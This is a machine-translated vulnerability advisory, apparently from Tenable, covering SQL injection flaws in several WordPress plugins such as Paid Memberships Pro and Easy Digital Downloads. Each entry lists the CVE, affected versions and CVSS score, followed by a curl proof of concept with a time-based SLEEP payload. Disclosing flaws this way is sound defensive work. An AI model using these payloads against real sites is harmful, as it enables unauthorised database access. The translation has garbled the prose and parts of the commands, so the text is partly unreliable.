约书亚Martinelle站得住脚的研究发现多个SQL注入漏洞的WordPress插件。该顾问将跟踪每个漏洞信息和修复。
付费会员职业:cve - 2023 - 23488 -未经身份验证的SQL注入
参考:https://wordpress.org/plugins/paid-memberships-pro
影响版本:< 2.9.8
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSSv3分数:9.8
插件不逃避“代码”参数顺序/ pmpro / v1 /其他路线在SQL语句中使用它之前,导致未经过身份验证的SQL注入漏洞。
的概念:
TARGET_HOST是wordpress主机的地址和付费会员专业安装,下列概念证明使用睡眠功能演示SQL注入。改变的值传递给睡眠会改变请求需要多长时间返回。
旋度“http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(选择% 20 201% % 20(选择(睡眠(2))))——% 20 -”
例如,运行这两次“时间”命令将显示响应时间的差异:
旋度”http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(选择% 20 201% % 20(选择(睡眠(1))))——% 20——“{}真实用户m0.006s sys 0 0 m3.068s m0.009s时间旋度“http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(选择% 20 201% % 20(选择(睡眠(2))))——% 20——“{}真正0 0 m0.006s sys 0 m0.009s m6.095s用户
简单的数字下载:cve - 2023 - 23489 -未经身份验证的SQL注入
参考:https://wordpress.org/plugins/easy-digital-downloads/
影响版本:3.1.0.2 & 3.1.0.3
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSSv3分数:9.8
插件不逃避的s参数“edd_download_search”行动在SQL语句中使用它之前,导致未经过身份验证的SQL注入漏洞。
脆弱的部分代码对应于“edd_ajax_download_search()的函数。/ / ajax功能。php的文件。
的概念:
TARGET_HOST是wordpress主机的地址和付费会员专业安装,下列概念证明使用睡眠功能演示SQL注入。改变的值传递给睡眠会改变请求需要多长时间返回。
注意:相同的SQL注入/独特的请求不会连续两次工作,作为“edd_ajax_download_search()的函数存储最近搜索30秒(再次运行相同的负载,您将不得不修改负载或等待30秒)。
旋度“http://TARGET_HOST/wp-admin/admin-ajax.php?action=edd_download_search&s=1”+和+(选择+ 1 + +(选择(睡眠(2)))),+ - - - - - -”
调查公司:cve - 2023 - 23490 -验证SQL注入
参考:https://wordpress.org/plugins/survey-maker
影响版本:< 3.1.2
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8
插件不逃避的surveys_ids参数“ays_surveys_export_json”行动在SQL语句中使用它之前,导致身份验证SQL注入漏洞。
漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”action = ays_surveys_export_json&surveys_ids[0] = 1) +和+(选择+ 1 + +(选择(睡眠(3))))——+ - - - - - -”
ReviewX: cve - 2023 - 26325 -验证SQL注入
参考:https://wordpress.org/plugins/reviewx/
影响版本:< = 1.6.6
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8
插件没有逃脱“filterValue”或“selectedColumns”参数rx_export_review行动在SQL语句中使用它们之前,导致SQL注入。
漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”action = rx_export_review&filterValue [0] = &filterValue [1] = &filterValue [2] = &filterValue [3] = &filterValue [4] = all&filterValue [5] = &filterValue [6] = aaaa&filterValue [7] = id +和+(选择+ 1 + +(选择(睡眠(5))))&filterValue [8] = desc&selectedColumns [0] = id”
等待:一键式倒计时:cve - 2023 - 28659 -验证SQL注入
参考:https://wordpress.org/plugins/waiting/
影响版本:< = 0.6.2
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8
的pbc_down(元)(id)参数的pbc_save_downs行动是容易受到SQL注入。
漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”action = pbc_save_downs&pbc_down(元)(id) = 1 +或+(选择+ 1 + +(选择(睡眠(1))))——“
事件很容易:cve - 2023 - 28660 -验证SQL注入
参考:https://wordpress.org/plugins/events-made-easy/
影响版本:< = 2.3.14
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8
插件不逃避的search_name的参数eme_recurrences_list行动之前使用它在一个SQL语句,导致SQL注入漏洞。
漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax.php ? action = eme_recurrences_list&search_name = 1的{+}和{+}(选择+ 1 + +(选择(睡眠(0.5))))-{-}+{-}”——头“WP_COOKIE美元”
WP弹出横幅:cve - 2023 - 28661 -验证SQL注入
参考:https://wordpress.org/plugins/wp-popup-banners/
影响版本:< = 1.2.5
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8
插件不逃避的价值的参数get_popup_data行动之前使用它在一个SQL语句,导致SQL注入漏洞。
漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”行动= get_popup_data&value = 1 +和+(选择+ 1 + +(选择(睡眠(1))))”
礼品卡(礼券和包):cve - 2023 - 28662 -未经身份验证的SQL注入
参考:https://wordpress.org/plugins/gift-voucher/
影响版本:< = 4.3.1
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSSv3分数:9.8
插件不逃避的模板的参数wpgv_doajax_voucher_pdf_save_func行动之前使用它在一个SQL语句,导致SQL注入漏洞。
触发漏洞不需要身份验证。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户,而美元BASE64_INJECTION base64编码的SQL注入,例如:
LTEgT1IgU0xFRVAoMik =翻译为1或睡眠(2)
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php数据”——“行动= wpgv_doajax_voucher_pdf_save_func&template = $ BASE64_INJECTION "
或用一个合适的载荷:
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——数据”行动= wpgv_doajax_voucher_pdf_save_func&template = LTEgT1IgU0xFRVAoMik =”
强大的PRO2PDF: cve - 2023 - 28663 -验证SQL注入
参考:https://wordpress.org/plugins/formidablepro-2-pdf/
影响版本:< 3.11
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8
插件不逃避的fieldmap的参数fpropdf_export_file行动之前使用它在一个SQL语句,导致SQL注入漏洞。
漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。
的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。
旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”行动= fpropdf_export_file&fieldmap = 1 +和+(选择+ 1 + +(选择(睡眠(1))))”